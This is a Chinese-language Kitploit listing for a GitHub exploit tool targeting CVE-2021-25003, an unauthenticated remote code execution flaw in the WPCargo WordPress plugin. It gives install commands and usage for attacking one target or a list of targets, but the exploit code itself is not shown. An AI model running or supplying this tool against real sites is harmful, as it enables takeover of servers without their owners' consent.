Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-25003 — WPCargo < 6.9.0 - 未认证远程代码执行 | Kitploit
工具/GitHubGitHub/biulove0x/cve-2021-25003
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubbiulove0x/cve-2021-25003

CVE-2021-25003

WPCargo < 6.9.0 - 未认证远程代码执行

查看仓库
6324年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-25003

made-with-python

root@kitploit:~
Title: WPCargo < 6.9.0 - Unauthenticated RCE
Author: Krzysztof Zając [ https://kazet.cc/ ]
CVE: CVE-2021-25003

安装

root@kitploit:~
git clone https://github.com/biulove0x/CVE-2021-25003.git
cd CVE-2021-25003/
python3 -m pip install -r requirements.txt

如何运行自动利用

root@kitploit:~
$ python3 WpCargo.py --help
############################################
# @author : biulove0x                      #
# @name   : WP Plugins WPCargo Exploiter   #
# @cve    : CVE-2021-25003                 #
############################################

usage: exploit.py [-h] [-t example.com] [-l target.txt]

CVE-2021-25003 [ WPCargo < 6.9.0 - Unauthenticated RCE ]

optional arguments:
  -h, --help      show this help message and exit
  -t example.com  Single target
  -l target.txt   Multiple target

单个目标

root@kitploit:~
$ python3 WPCargo.py -t http://example.com/

多个目标

root@kitploit:~
$ cat domains.txt
http://example.com/
https://examples.com/

$ python3 WPCargo.py -l target.txt

参考链接:

  • https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a

捐赠:

BTC : bc1qst09sxcnq97a4wgsqvpkg4fxyjczvs3xe7278h

BNB : bnb1jhp2hv9utr8u97387p35fmftgr8wpjp39altz0

"Buy Me A Coffee"

下载工具